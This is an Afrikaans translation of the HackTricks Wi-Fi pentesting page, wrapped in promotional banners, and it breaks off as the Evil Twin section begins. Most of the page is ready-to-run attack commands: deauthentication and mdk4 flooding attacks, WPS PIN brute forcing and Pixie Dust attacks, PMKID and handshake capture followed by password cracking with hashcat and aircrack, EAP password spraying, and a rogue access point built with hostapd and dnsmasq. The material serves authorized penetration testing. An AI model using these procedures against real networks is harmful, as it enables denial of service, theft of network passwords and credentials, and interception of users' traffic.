.. | ||
evil-twin-eap-tls.md | ||
README.md |
Pentesting Wifi
Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS Familie, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel jou haktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
Sluit aan by HackenProof Discord bediener om met ervare hackers en foutbeloningsjagters te kommunikeer!
Hakinsigte
Gaan in gesprek met inhoud wat die opwinding en uitdagings van hak bevat
Haknuus in Werklikheid
Bly op hoogte van die snelveranderende hakwêreld deur werklikheidsnuus en insigte
Nuutste Aankondigings
Bly ingelig met die nuutste foutbelonings wat bekendgestel word en belangrike platformopdaterings
Sluit by ons aan op Discord en begin vandag saamwerk met top hackers!
Wifi basiese bevele
ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis
Gereedskap
EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
Airgeddon
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe
Hardloop airgeddon met docker
docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon
Van: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux
wifiphisher
Dit kan Evil Twin, KARMA, en Bekende Sein aanvalle uitvoer en dan 'n hengel sjabloon gebruik om die netwerk se werklike wagwoord te verkry of sosiale netwerk geloofsbriewe vas te vang.
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies
Wifite2
Hierdie gereedskap outomatiseer WPS/WEP/WPA-PSK aanvalle. Dit sal outomaties:
- Stel die koppelvlak in monitor-modus
- Skandeer vir moontlike netwerke - En laat jou die slagoffer(s) kies
- As WEP - Lanseer WEP aanvalle
- As WPA-PSK
- As WPS: Pixie dust aanval en die bruteforce aanval (wees versigtig, die bruteforce aanval kan 'n lang tyd neem). Let daarop dat dit nie nul PIN of databasis/opgewekte PINs probeer nie.
- Probeer om die PMKID van die AP vas te vang om dit te kraak
- Probeer om kliënte van die AP te deautentiseer om 'n handshake vas te vang
- As PMKID of Handshake, probeer om te bruteforce met behulp van top5000 wagwoorde.
Aanvalle Opsomming
- DoS
- Deautentisering/ontkoppeling -- Ontkoppel almal (of 'n spesifieke ESSID/Kliënt)
- Lukrake valse AP's -- Versteek netwerke, moontlike skandeerders kan vasloop
- Oorlading AP -- Probeer om die AP te laat afgaan (gewoonlik nie baie nuttig nie)
- WIDS -- Speel met die IDS
- TKIP, EAPOL -- Sekere spesifieke aanvalle om sommige AP's te DoS
- Kraak
- Kraak WEP (verskeie gereedskappe en metodes)
- WPA-PSK
- WPS pin "Brute-Force"
- WPA PMKID bruteforce
- [DoS +] WPA handshake vasvang + Kraak
- WPA-MGT
- Gebruikersnaam vasvang
- Bruteforce Gelde
- Bose Tweeling (met of sonder DoS)
- Oop Bose Tweeling [+ DoS] -- Nuttig om gevangene portaal gelde vas te vang en/of LAN aanvalle uit te voer
- WPA-PSK Bose Tweeling -- Nuttig vir netwerkaanvalle as jy die wagwoord weet
- WPA-MGT -- Nuttig om maatskappy gelde vas te vang
- KARMA, MANA, Loud MANA, Bekende baken
- + Oop -- Nuttig om gevangene portaal gelde vas te vang en/of LAN aanvalle uit te voer
- + WPA -- Nuttig om WPA handshakes vas te vang
DOS
Deautentiseringspakette
Beskrywing van hier:.
Deautentiserings aanvalle, 'n algemene metode in Wi-Fi hak, behels die vervalsing van "bestuurs" rame om toestelle kragtig van 'n netwerk af te koppel. Hierdie onversleutelde pakkette mislei kliënte om te glo dat hulle van die regte netwerk afkomstig is, wat aanvallers in staat stel om WPA handshakes vir kraakdoeleindes te versamel of om aanhoudend netwerkverbindings te ontwrig. Hierdie taktiek, verontrustend in sy eenvoud, word wyd gebruik en het beduidende implikasies vir netwerksekuriteit.
Deautentisering deur Aireplay-ng
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
- -0 beteken deautentifikasie
- 1 is die aantal deautentifikasies om te stuur (jy kan meerdere stuur indien jy wil); 0 beteken stuur hulle aanhoudend
- -a 00:14:6C:7E:40:80 is die MAC-adres van die toegangspunt
- -c 00:0F:B5:34:30:30 is die MAC-adres van die klient om te deautentifiseer; as dit weggelaat word, word uitsaaideautentifikasie gestuur (werk nie altyd nie)
- ath0 is die koppelvlaknaam
Ontkoppelingspakette
Ontkoppelingspakette, soortgelyk aan deautentifikasiepakette, is 'n tipe bestuursraamwerk wat in Wi-Fi-netwerke gebruik word. Hierdie pakkette dien om die verbinding tussen 'n toestel (soos 'n draagbare rekenaar of slimfoon) en 'n toegangspunt (AP) te verbreek. Die primêre onderskeid tussen ontkoppeling en deautentifikasie lê in hul gebruikscenario's. Terwyl 'n AP **deautentifikasiepakette uitsaai om kwaadwillige toestelle eksplisiet van die netwerk te verwyder, word ontkoppelingspakette tipies gestuur wanneer die AP 'n afsluiting, herlaaiing of herlokalisering ondergaan, wat dus die ontkoppeling van alle gekoppelde knooppunte noodsaaklik maak.
Hierdie aanval kan uitgevoer word deur mdk4 (modus "d"):
# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
Meer DOS-aanvalle deur mdk4
In hier.
AANVALMODUS b: Beacon-oorstroming
Stuur bakenskemas om valse AP's aan kliënte te wys. Dit kan soms netwerkskandeerders en selfs drywers laat vasloop!
# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m
AANVALMODUS a: Verifikasie-ontkenning-van-diens
Die stuur van verifikasie-rame na alle toeganklike Toegangspunte (AP's) binne bereik kan hierdie AP's oorlê, veral wanneer talle kliënte betrokke is. Hierdie intense verkeer kan lei tot sisteem-onstabiliteit, wat veroorsaak dat sommige AP's vries of selfs herstel.
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m
AANVALMODUS p: SSID-Ondersoek en Bruteforcing
Die ondersoek van Toegangspunte (AP's) toets of 'n SSID behoorlik onthul word en bevestig die AP se reikwydte. Hierdie tegniek, gekoppel met bruteforcing van verskuilde SSID's met of sonder 'n woordelys, help om verskuilde netwerke te identifiseer en toegang tot hulle te verkry.
AANVALMODUS m: Michael Teenmaatreëls Uitbuiting
Die stuur van lukrake of duplikaat pakkies na verskillende QoS-rye kan Michael Teenmaatreëls op TKIP AP's in werking stel, wat tot 'n een-minuut AP-afsluiting kan lei. Hierdie metode is 'n doeltreffende DoS (Ontkenning van Diens) aanvalstegniek.
# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]
AANVALMODUS e: EAPOL Begin- en Aflaai-pakketinspuiting
Die oorlaai van 'n AP met EAPOL Begin-rame skep vals sessies, wat die AP oorweldig en legitieme kliënte blokkeer. Alternatiewelik, deur vals EAPOL Aflaai-boodskappe in te spuit, word kliënte kragdadig afgekoppel, beide metodes versteur netwerkdienste effektief.
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]
AANVALMODUS s: Aanvalle vir IEEE 802.11s masnetwerke
Verskeie aanvalle op skakelbestuur en roeteverwerking in masnetwerke.
AANVALMODUS w: WIDS Verwarring
Kruiskoppel van kliënte aan verskeie WDS-node of valse skelm AP's kan Intrusiedeteksie en -voorkomingsstelsels manipuleer, verwarring skep en potensiële stelselmisbruik.
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]
AANVALMODUS f: Pakket Fuzzer
'n Pakket fuzzer wat diverse pakketsbronne en 'n omvattende stel veranderlikes vir pakkets manipulasie bied.
Airggedon
Airgeddon bied die meeste van die aanvalle wat voorgestel is in die vorige opmerkings:
WPS
WPS (Wi-Fi Protected Setup) vereenvoudig die proses om toestelle aan 'n router te koppel, verbeter die opstellingspoed en gemak vir netwerke wat versleutel is met WPA of WPA2 Persoonlik. Dit is ondoeltreffend vir die maklik gekompromitteerde WEP-sekuriteit. WPS gebruik 'n 8-syfer-PIN, geverifieer in twee helftes, wat dit vatbaar maak vir brute-force aanvalle as gevolg van sy beperkte aantal kombinasies (11,000 moontlikhede).
WPS Brute Force
Daar is 2 hoofgereedskap om hierdie aksie uit te voer: Reaver en Bully.
- Reaver is ontwerp om 'n robuuste en praktiese aanval teen WPS te wees, en is getoets teen 'n wye verskeidenheid toegangspunte en WPS-implementasies.
- Bully is 'n nuwe implementasie van die WPS brute force aanval, geskryf in C. Dit het verskeie voordele bo die oorspronklike reaver-kode: minder afhanklikhede, verbeterde geheue- en cpu-prestasie, korrekte hantering van endianness, en 'n meer robuuste stel opsies.
Die aanval maak gebruik van die kwesbaarheid van die WPS-PIN, veral die blootstelling van die eerste vier syfers en die laaste syfer se rol as 'n kontrolesom, wat die brute-force aanval vergemaklik. Tog vereis verdedigings teen brute-force aanvalle, soos blokkering van MAC-adresse van aggressiewe aanvallers, MAC-adresrotasie om die aanval voort te sit.
Na die verkryging van die WPS-PIN met gereedskap soos Bully of Reaver, kan die aanvaller die WPA/WPA2 PSK aflei, wat volgehoue netwerktoegang verseker.
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
Slim Kragtige Aanval
Hierdie verfynde benadering teiken WPS PINs deur bekende kwesbaarhede te gebruik:
- Vooraf ontdekte PINs: Maak gebruik van 'n databasis van bekende PINs wat gekoppel is aan spesifieke vervaardigers wat bekend is om uniforme WPS PINs te gebruik. Hierdie databasis koppel die eerste drie oktet van MAC-adresse aan waarskynlike PINs vir hierdie vervaardigers.
- PIN-generasie-algoritmes: Benut algoritmes soos ComputePIN en EasyBox, wat WPS PINs bereken gebaseer op die AP se MAC-adres. Die Arcadyan-algoritme vereis addisioneel 'n toestel-ID, wat 'n laag tot die PIN-generasieproses byvoeg.
WPS Pixie Dust-aanval
Dominique Bongard het 'n fout ontdek in sommige Toegangspunte (AP's) rakende die skep van geheime kodes, bekend as nonce (E-S1 en E-S2). As hierdie nonces uitgewerk kan word, word dit maklik om die AP se WPS PIN te kraak. Die AP onthul die PIN binne 'n spesiale kode (hash) om te bewys dat dit legitiem is en nie 'n vervalsing (skelm) AP is nie. Hierdie nonces is essensieel die "sleutels" om die "kluis" wat die WPS PIN bevat, te ontsluit. Meer hieroor kan gevind word hier.
In eenvoudige terme is die probleem dat sommige AP's nie genoeg random sleutels gebruik het vir die enkripsie van die PIN tydens die verbindingsproses nie. Dit maak die PIN vatbaar om van buite die netwerk geradeer te word (aflyn kragtige aanval).
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
Indien jy nie die toestel wil oorskakel na monitor-modus nie, of reaver
en bully
het 'n probleem, kan jy OneShot-C probeer. Hierdie gereedskap kan 'n Pixie Dust-aanval uitvoer sonder om na monitor-modus oor te skakel.
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37
Nul Pin-aanval
Sommige swak ontwerpte stelsels laat selfs 'n Nul PIN ( 'n leë of nie-bestaande PIN) toegang verleen, wat nogal ongewoon is. Die instrument Reaver is in staat om hierdie kwesbaarheid te toets, in teenstelling met Bully.
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
Airgeddon
Al die voorgestelde WPS-aanvalle kan maklik uitgevoer word met airgeddon.
- 5 en 6 laat jou toe om jou eie PIN te probeer (as jy enige het)
- 7 en 8 voer die Pixie Dust-aanval uit
- 13 laat jou toe om die NULL PIN te toets
- 11 en 12 sal die PINs wat verband hou met die gekose AP van beskikbare databasisse herwin en moontlike PINs genereer met behulp van: ComputePIN, EasyBox en opsioneel Arcadyan (aanbeveel, hoekom nie?)
- 9 en 10 sal elke moontlike PIN toets
WEP
So gebreek en ongebruik deesdae. Weet net dat airgeddon 'n WEP-opsie genaamd "All-in-One" het om hierdie soort beskerming aan te val. Meer gereedskap bied soortgelyke opsies aan.
Sluit aan by HackenProof Discord bediener om met ervare hackers en foutbeloningsjagters te kommunikeer!
Hack-insigte
Gaan in gesprek met inhoud wat die opwinding en uitdagings van hack bekyk
Hack Nuus in Werklikheid
Bly op hoogte van die vinnige hack-wêreld deur middel van nuus en insigte in werklikheid
Nuutste Aankondigings
Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platformopdaterings
Sluit by ons aan op Discord en begin vandag saamwerk met top hackers!
WPA/WPA2 PSK
PMKID
In 2018 het hashcat bekend gemaak 'n nuwe aanvalsmetode, uniek omdat dit slegs een enkele pakkie benodig en nie vereis dat enige kliënte met die teiken-AP verbind is nie—net interaksie tussen die aanvaller en die AP.
Baie moderne routers voeg 'n opsionele veld by die eerste EAPOL-raam tydens assosiasie, bekend as Robust Security Network
. Dit sluit die PMKID
in.
Soos die oorspronklike pos verduidelik, word die PMKID geskep met bekende data:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Gegewe dat die "PMK-naam" konstant is, weet ons die BSSID van die AP en die stasie, en die PMK
is identies aan dié van 'n volledige 4-weg-handshaking, kan hashcat hierdie inligting gebruik om die PSK te kraak en die wagwoord te herstel!
Om hierdie inligting te versamel en plaaslik die wagwoord te brute force, kan jy doen:
airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1
Die PMKIDs wat gevang is, sal in die konsole vertoon word en ook gestoor word binne _ /tmp/attack.pcap_
Nou, omskep die vangste na hashcat/john formaat en kraak dit:
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Let asseblief daarop dat die formaat van 'n korrekte has 4 dele bevat, soos: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838
As joune slegs 3 dele bevat, dan is dit ongeldig (die PMKID-vangste was nie geldig nie).
Merk op dat hcxdumptool
ook handskrifte vasvang (iets soos hierdie sal verskyn: MP:M1M2 RC:63258 EAPOLTIME:17091
). Jy kan die handskrifte na hashcat/john formaat omskep deur cap2hccapx
te gebruik
tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes
Ek het opgemerk dat sommige handskrifte wat met hierdie instrument vasgelê is, selfs met die regte wagwoord nie gekraak kon word nie. Ek sal aanbeveel om handskrifte ook op die tradisionele manier vas te lê indien moontlik, of om verskeie daarvan met behulp van hierdie instrument vas te lê.
Handskrif vaslê
'n Aanval op WPA/WPA2-netwerke kan uitgevoer word deur 'n handskryf vas te lê en te probeer om die wagwoord aflyn te kraak. Hierdie proses behels die monitorering van die kommunikasie van 'n spesifieke netwerk en BSSID op 'n bepaalde kanaal. Hier is 'n gestroomlynde gids:
- Identifiseer die BSSID, kanaal, en 'n verbonde kliënt van die teiken netwerk.
- Gebruik
airodump-ng
om die netwerkverkeer op die gespesifiseerde kanaal en BSSID te monitor, in die hoop om 'n handskrif vas te lê. Die bevel sal soos volg lyk:
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
- Om die kans te verhoog om 'n handdruk vas te vang, verbreek die klient tydelik van die netwerk om 'n her-autentisering af te dwing. Dit kan gedoen word deur die
aireplay-ng
bevel te gebruik, wat de-autentiseringspakkies na die klient stuur:
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios
Noot dat aangesien die klient gedeautentiseer was, kan dit probeer om met 'n ander AP te verbind of, in ander gevalle, met 'n ander netwerk.
Sodra die airodump-ng
'n handskrifinligting toon, beteken dit dat die handskrif vasgelê is en jy kan ophou luister:
Sodra die handskrif vasgelê is, kan jy dit kraak met aircrack-ng
:
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
Kontroleer of handdruk in lêer
aircrack
aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture
tshark
tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.
cowpatty -r psk-01.cap -s "ESSID" -f -
Indien hierdie instrument 'n onvoltooide handdruk van 'n ESSID vind voordat die voltooide een, sal dit nie die geldige een opspoor nie.
pyrit
apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze
WPA Enterprise (MGT)
In ondernemings WiFi-opstelle, sal jy verskeie verifikasiemetodes teëkom, wat elk verskillende sekuriteitsvlakke en bestuurskenmerke bied. Wanneer jy gereedskap soos airodump-ng
gebruik om netwerkverkeer te inspekteer, mag jy identifiseerders vir hierdie verifikasietipes opmerk. Sommige algemene metodes sluit in:
6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi
- EAP-GTC (Generic Token Card):
- Hierdie metode ondersteun hardeware tokens en eenmalige wagwoorde binne EAP-PEAP. Anders as MSCHAPv2, gebruik dit nie 'n ewekansige uitdaging nie en stuur wagwoorde in teks na die toegangspunt, wat 'n risiko vir afgraderingsaanvalle inhou.
- EAP-MD5 (Boodskap Digest 5):
- Behels die stuur van die MD5-hash van die wagwoord van die klient. Dit word nie aanbeveel weens die kwesbaarheid vir woordeboekaanvalle, gebrek aan bedienerverifikasie, en onvermoë om sessiespesifieke WEP-sleutels te genereer.
- EAP-TLS (Transportlaag-sekuriteit):
- Gebruik beide klient- en bedienersertifikate vir verifikasie en kan gebruikersgebaseerde en sessiegebaseerde WEP-sleutels dinamies genereer vir die beveiliging van kommunikasie.
- EAP-TTLS (Getunnelde Transportlaag-sekuriteit):
- Bied wedersydse verifikasie deur 'n versleutelde tonnel, saam met 'n metode om dinamiese, per-gebruiker, per-sessie WEP-sleutels af te lei. Dit vereis slegs bedienersertifikate, met kliente wat geloofsbriewe gebruik.
- PEAP (Beskermde Uitbreibare Verifikasieprotokol):
- Werk soortgelyk aan EAP deur 'n TLS-tonnel vir beskermde kommunikasie te skep. Dit maak die gebruik van swakker verifikasieprotokolle bo-op EAP moontlik as gevolg van die beskerming wat deur die tonnel gebied word.
- PEAP-MSCHAPv2: Dikwels verwys na as PEAP, dit kombineer die kwesbare MSCHAPv2-uitdaging/reaksiemeganisme met 'n beskermende TLS-tonnel.
- PEAP-EAP-TLS (of PEAP-TLS): Soortgelyk aan EAP-TLS, maar inisieer 'n TLS-tonnel voordat sertifikate uitgeruil word, wat 'n addisionele laag van sekuriteit bied.
Jy kan meer inligting oor hierdie verifikasiemetodes hier en hier vind.
Gebruikersnaam Vaslegging
Deur https://tools.ietf.org/html/rfc3748#page-27 te lees, lyk dit asof as jy EAP gebruik, moet die "Identiteit" boodskappe ondersteun word, en die gebruikersnaam sal in die "Reaksie Identiteit" boodskappe in teks gestuur word.
Selfs al gebruik jy een van die mees veilige verifikasiemetodes: PEAP-EAP-TLS, is dit moontlik om die gebruikersnaam wat in die EAP-protokol gestuur word, vas te lê. Om dit te doen, vang 'n verifikasiekommunikasie (begin airodump-ng
binne 'n kanaal en wireshark
in dieselfde koppelvlak) en filtreer die pakkies met eapol
.
Binne die "Reaksie, Identiteit" pakkie, sal die gebruikersnaam van die klient verskyn.
Anonieme Identiteite
Identiteitshiding word ondersteun deur beide EAP-PEAP en EAP-TTLS. In die konteks van 'n WiFi-netwerk, word 'n EAP-Identiteit versoek tipies deur die toegangspunt (AP) geïnisieer gedurende die assosiasieproses. Om die beskerming van gebruikersanonimiteit te verseker, bevat die reaksie van die EAP-klient op die gebruikers se toestel slegs die noodsaaklike inligting wat benodig word vir die aanvanklike RADIUS-bedieners om die versoek te verwerk. Hierdie konsep word geïllustreer deur die volgende scenario's:
- EAP-Identiteit = anoniem
- In hierdie scenario gebruik alle gebruikers die psudoniem "anoniem" as hul gebruikersidentifiseerder. Die aanvanklike RADIUS-bediener funksioneer as 'n EAP-PEAP of EAP-TTLS bediener, verantwoordelik vir die bestuur van die bedienerskant van die PEAP of TTLS-protokol. Die binne (beskermde) verifikasiemetode word dan óf plaaslik hanteer óf gedelegeer na 'n afgeleë (tuis) RADIUS-bediener.
- EAP-Identiteit = anoniem@realm_x
- In hierdie situasie verberg gebruikers uit verskillende realms hul identiteite terwyl hulle hul onderskeie realms aandui. Dit maak dit vir die aanvanklike RADIUS-bediener moontlik om die EAP-PEAP of EAP-TTLS versoek na RADIUS-bedieners in hul tuisrealms te stuur, wat as die PEAP of TTLS-bediener optree. Die aanvanklike RADIUS-bediener funksioneer slegs as 'n RADIUS-relaisnode.
- Alternatiewelik kan die aanvanklike RADIUS-bediener as die EAP-PEAP of EAP-TTLS bediener funksioneer en óf die beskermde verifikasiemetode hanteer óf dit na 'n ander bediener deurgee. Hierdie opsie fasiliteer die konfigurasie van onderskeie beleide vir verskeie realms.
In EAP-PEAP, sodra die TLS-tonnel tussen die PEAP-bediener en die PEAP-klient opgerig is, inisieer die PEAP-bediener 'n EAP-Identiteit versoek en stuur dit deur die TLS-tonnel. Die klient reageer op hierdie tweede EAP-Identiteit versoek deur 'n EAP-Identiteit reaksie te stuur wat die ware identiteit van die gebruiker deur die versleutelde tonnel bevat. Hierdie benadering voorkom doeltreffend die bekendmaking van die gebruiker se werklike identiteit aan enigiemand wat na die 802.11-verkeer luister.
EAP-TTLS volg 'n effens ander prosedure. Met EAP-TTLS, verifieer die klient tipies deur PAP of CHAP te gebruik, beveilig deur die TLS-tonnel. In hierdie geval sluit die klient 'n Gebruikersnaam-eienskap en óf 'n Wagwoord of CHAP-Wagwoord-eienskap in die aanvanklike TLS-boodskap in wat na tonneloprigting gestuur word.
Ongeag die gekose protokol, verkry die PEAP/TTLS-bediener kennis van die gebruiker se ware identiteit nadat die TLS-tonnel opgerig is. Die ware identiteit kan voorgestel word as gebruiker@realm of eenvoudigweg gebruiker. As die PEAP/TTLS-bediener ook verantwoordelik is vir die verifikasie van die gebruiker, beskik dit nou oor die gebruiker se identiteit en gaan voort met die verifikasiemetode wat deur die TLS-tonnel beskerm word. Alternatiewelik kan die PEAP/TTLS-bediener 'n nuwe RADIUS-versoek na die gebruiker se tuis-RADIUS-bediener stuur. Hierdie nuwe RADIUS-versoek sluit die PEAP- of TTLS-protokollaag uit. In gevalle waar die beskermde verifikasiemetode EAP is, word die binne EAP-boodskappe na die tuis-RADIUS-bediener gestuur sonder die EAP-PEAP- of EAP-TTLS-omhulsel. Die Gebruikersnaam-eienskap van die uitgaande RADIUS-boodskap bevat die gebruiker se ware identiteit, wat die anonieme Gebruikersnaam van die inkomende RADIUS-versoek vervang. Wanneer die beskermde verifikasiemetode PAP of CHAP is (slegs ondersteun deur TTLS), word die Gebruikersnaam en ander verifikasie-eienskappe wat uit die TLS-lading onttrek is, in die uitgaande RADIUS-boodskap vervang, wat die anonieme Gebruikersnaam en TTLS EAP-Boodskap-eienskappe wat in die inkomende RADIUS-versoek gevind is, verplaas.
Vir meer inligting, kyk na https://www.interlinknetworks.com/app_notes/eap-peap.htm
EAP-Bruteforce (wagwoordspuit)
As daar van die klient verwag word om 'n gebruikersnaam en wagwoord te gebruik (let daarop dat EAP-TLS nie geldig sal wees in hierdie geval nie), kan jy probeer om 'n lys van gebruikersname (sien volgende deel) en wagwoorde te kry en die toegang te spuit met behulp van air-hammer.
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
Jy kan ook hierdie aanval uitvoer met behulp van eaphammer
:
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt
Kliëntaanvalle Teorie
Netwerkkeuse en Roaming
- Die 802.11-protokol definieer hoe 'n stasie by 'n Uitgebreide Diensstel (ESS) aansluit, maar spesifiseer nie die kriteria vir die keuse van 'n ESS of 'n toegangspunt (AP) binne dit nie.
- Stasies kan tussen AP's wat dieselfde ESSID deel, rondloop, en sodoende konnektiwiteit regdeur 'n gebou of area handhaaf.
- Die protokol vereis stasie-outentifikasie aan die ESS, maar nie AP-outentifikasie aan die stasie nie.
Voorkeur Netwerklyste (PNL's)
- Stasies stoor die ESSID van elke draadlose netwerk waarmee hulle verbind in hul Voorkeur Netwerklyste (PNL's), saam met netwerkspesifieke konfigurasiebesonderhede.
- Die PNL word gebruik om outomaties aan bekende netwerke te koppel, wat die gebruiker se ervaring verbeter deur die koppelingsproses te stroomlyn.
Passiewe Skandering
- AP's straal periodiek bakenskemas uit, wat hul teenwoordigheid en kenmerke aankondig, insluitend die AP se ESSID tensy uitsaai uitgeskakel is.
- Tydens passiewe skandering luister stasies vir bakenskemas. As 'n baken se ESSID ooreenstem met 'n inskrywing in die stasie se PNL, kan die stasie outomaties daaraan koppel.
- Kennis van 'n toestel se PNL maak potensiële uitbuiting moontlik deur 'n bekende netwerk se ESSID na te boots, wat die toestel laat koppel aan 'n bedrieglike AP.
Aktiewe Ondersoek
- Aktiewe ondersoek behels stasies wat navraagopdragte stuur om nabygeleë AP's en hul eienskappe te ontdek.
- Gerigte navraagopdragte teiken 'n spesifieke ESSID, wat help om te bepaal of 'n bepaalde netwerk binne bereik is, selfs as dit 'n verskuilde netwerk is.
- Uitsaai navraagopdragte het 'n nul SSID-veld en word gestuur na alle nabygeleë AP's, wat die stasie in staat stel om vir enige voorkeur netwerk te soek sonder om sy PNL-inhoud bekend te maak.
Eenvoudige AP met omleiding na die Internet
Voordat daar verduidelik word hoe om meer komplekse aanvalle uit te voer, sal daar verduidelik word hoe om net 'n AP te skep en dit se verkeer te omlei na 'n koppelvlak wat aan die Internet verbind is.
Deur ifconfig -a
te gebruik, kontroleer dat die wlan-koppelvlak om die AP te skep en die koppelvlak wat aan die Internet verbind is, teenwoordig is.
DHCP & DNS
apt-get install dnsmasq #Manages DHCP and DNS
Skep die konfigurasie lêer /etc/dnsmasq.conf
:
interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Dan stel IP-adresse en roetes in:
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
En begin dan dnsmasq:
dnsmasq -C dnsmasq.conf -d
hostapd
apt-get install hostapd
Skep 'n konfigurasie lêer hostapd.conf
:
interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1
Stop irriterende prosesse, stel monitor-modus in, en begin hostapd:
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
hostapd ./hostapd.conf
Deurverwysing en Herleiing
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Boosaardige Tweeling
'n Boosaardige tweelingaanval maak gebruik van die manier waarop WiFi-kliënte netwerke herken, wat hoofsaaklik staatmaak op die netwerknaam (ESSID) sonder om die basisstasie (toegangspunt) te vereis om homself aan die kliënt te authentiseer. Sleutelpunte sluit in:
